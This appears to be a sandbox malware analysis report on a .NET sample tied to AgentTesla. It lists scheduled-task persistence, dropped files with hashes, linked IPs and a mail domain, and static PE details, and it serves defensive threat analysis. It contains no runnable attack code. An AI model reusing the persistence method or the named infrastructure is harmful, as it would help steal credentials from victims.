                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: LisectAVT_2403002A_16.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            17:35:16API Interceptor22x Sleep call for process: LisectAVT_2403002A_16.exe modified
                            17:35:19API Interceptor55x Sleep call for process: powershell.exe modified
                            17:35:24API Interceptor17x Sleep call for process: NxmtwwVGOtEdjd.exe modified
                            22:35:20Task SchedulerRun new task: NxmtwwVGOtEdjd path: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            199.79.62.115SQ112613x2614763.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Quote ZBR223378.exeGet hashmaliciousAgentTeslaBrowse
                                PO-07172484.exeGet hashmaliciousAgentTeslaBrowse
                                  PURCHASE ORDER- 6300-2024.exeGet hashmaliciousAgentTeslaBrowse
                                    SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.30254.8280.exeGet hashmaliciousAgentTeslaBrowse
                                      PURCHASE ORDER-6333-2024.exeGet hashmaliciousAgentTeslaBrowse
                                        SecuriteInfo.com.Win32.PWSX-gen.21784.812.exeGet hashmaliciousAgentTeslaBrowse
                                          Quotation - 00645.exeGet hashmaliciousAgentTeslaBrowse
                                            PRICE REQUEST-717-26072023.exeGet hashmaliciousAgentTeslaBrowse
                                              PO82107048.exeGet hashmaliciousAgentTeslaBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                mail.mbarieservicesltd.comSQ112613x2614763.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PUBLIC-DOMAIN-REGISTRYUSLisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.198.143
                                                SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.224
                                                LisectAVT_2403002B_290.exeGet hashmaliciousBdaejecBrowse
                                                • 74.119.239.234
                                                LisectAVT_2403002B_465.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.223
                                                jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.225
                                                SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.198.143
                                                bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                                                • 204.11.58.71
                                                PO#1164031.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 208.91.198.24
                                                5RQ24SOW EPIRB_TOTAL Marine Services Ltd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 208.91.198.24
                                                LCWGT83qLa.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.223

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LisectAVT_2403002A_16.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NxmtwwVGOtEdjd.exe.log

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2232
                                                Entropy (8bit):5.379552885213346
                                                Encrypted:false
                                                SSDEEP:48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMRvUyus:fLHxvCZfIfSKRHmOugras
                                                MD5:536673CFEEBA235304073B32A6519556
                                                SHA1:31B610549B437B8290C8B20809704C1118CCC457
                                                SHA-256:E7BBD1CC511FA56E4A5ABD9403A0A40A9B789CA77B12418A28BFC34FB96E46BC
                                                SHA-512:100211350FFCD4CC63BAA55B75FAAFAEA3524F2E58142883E3C40E63990264D57F4D13536ADC06D2342270CE48C9000D9EA1E81BB045FB9A1EBADEEB1D963D13
                                                Malicious:false
                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40gz0kas.ain.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iutd4lxs.fyj.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0zj4ktp.mr3.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0jvrel1.rfo.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbzb3ojr.e34.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mutlxdu2.sjn.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tislt1pd.oyq.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_waew54ts.0wj.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1580
                                                Entropy (8bit):5.116484496204205
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTcv
                                                MD5:1AC293B57893D7F15FEC2D62F2B81B15
                                                SHA1:7D73A01CDEBDC72F08EF5001BE928CADFAE17FF7
                                                SHA-256:7F4C202C63938CB22EED8ABDC026F2AE89379086669AFCE07C713A74331736C8
                                                SHA-512:92BF0B98B56A2C92C493F33CD6478901E25E78411AE816D941467F30139941ABD96DFA3D7787580BD445ACEC7679F4DF09341F8DB3ED183A7FA9AF3FBF9F5B2E
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1580
                                                Entropy (8bit):5.116484496204205
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTcv
                                                MD5:1AC293B57893D7F15FEC2D62F2B81B15
                                                SHA1:7D73A01CDEBDC72F08EF5001BE928CADFAE17FF7
                                                SHA-256:7F4C202C63938CB22EED8ABDC026F2AE89379086669AFCE07C713A74331736C8
                                                SHA-512:92BF0B98B56A2C92C493F33CD6478901E25E78411AE816D941467F30139941ABD96DFA3D7787580BD445ACEC7679F4DF09341F8DB3ED183A7FA9AF3FBF9F5B2E
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):685063
                                                Entropy (8bit):7.60396683966757
                                                Encrypted:false
                                                SSDEEP:12288:RkXayww0J7RG6YnakFrTtJ7IomjXXIR+w8/6ODi6dU3bAil+8I4:WajBtN+aOrTtJ7IZ4EwQh1d9iot
                                                MD5:2C10CB6C2E23B7712EBF4042D669CD09
                                                SHA1:F86ADB59BD065AFD9195B9375271096F341842DC
                                                SHA-256:546569A42F00553D7FDA79E6961779AFADD95EA8E6A8738EF344275F2B642244
                                                SHA-512:2AC43799B1C4169308CCAB675563897BC6D3A144EBDE4FD214D4BCE114A978576A5980CEC8909A37B12C912B86297645CC79F8E9BB0C21EA4ECDA409E3492ABA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.................0..j..........f.... ........@.. ....................................@.....................................O....................................q..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............r..............@..B................F.......H.......|e...C..........`...(............................................0.............?......?...%.n...(.......?...%.r...(.......?...%.p...(.......?...%.o...(........?...%.q...(...............r...p(....-:..r...p(....-5..r...p(....-0..r...p(....-+..r...p(....-'+/.(...+.+&.(...+.+..(...+.+...(...+.+...(...+.+....+...*...0..,.......sg......}s........h...s....(...+..(...+.+..*.0..{........~)...o....}.....~*...}...........}.......?...}......}......}.....(.......(......(......(...

                                                C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.60396683966757
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:LisectAVT_2403002A_16.exe
                                                File size:685'063 bytes
                                                MD5:2c10cb6c2e23b7712ebf4042d669cd09
                                                SHA1:f86adb59bd065afd9195b9375271096f341842dc
                                                SHA256:546569a42f00553d7fda79e6961779afadd95ea8e6a8738ef344275f2b642244
                                                SHA512:2ac43799b1c4169308ccab675563897bc6d3a144ebde4fd214d4bce114a978576a5980cec8909a37b12c912b86297645cc79f8e9bb0c21ea4ecda409e3492aba
                                                SSDEEP:12288:RkXayww0J7RG6YnakFrTtJ7IomjXXIR+w8/6ODi6dU3bAil+8I4:WajBtN+aOrTtJ7IZ4EwQh1d9iot
                                                TLSH:0AE412B2124D6725E6A827F5424AD17243B14D978464C24C8FCABCCF7979F80C61AEBF
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.................0..j..........f.... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:90cececece8e8eb0

                                                Static PE Info

                                                General

                                                Entrypoint:0x4a8966
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xFEADA566 [Tue May 26 14:55:34 2105 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                inc ecx
                                                add cl, al
                                                add bl, al
                                                add dl, al
                                                add al, al
                                                add ah, al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [edi+00h], cl
                                                rol dword ptr [eax], cl
                                                aad 00h
                                                aam 00h
                                                rol byte ptr [eax], cl
                                                salc
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx+00h], cl
                                                int 00h
                                                into
                                                add ah, cl
                                                add bh, cl
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ebp+00h], dl
                                                fiadd dword ptr [eax]
                                                fild dword ptr [eax]
                                                fld dword ptr [eax]
                                                fadd qword ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                inc ebp
                                                add cl, cl
                                                add dl, cl
                                                add al, cl
                                                add bl, cl
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa89120x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x5ac.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xa71880x70.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xa69bc0xa6a0029c64714f527c3485fff68ff7c6bdb09False0.8639098251125281data7.613224313381159IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
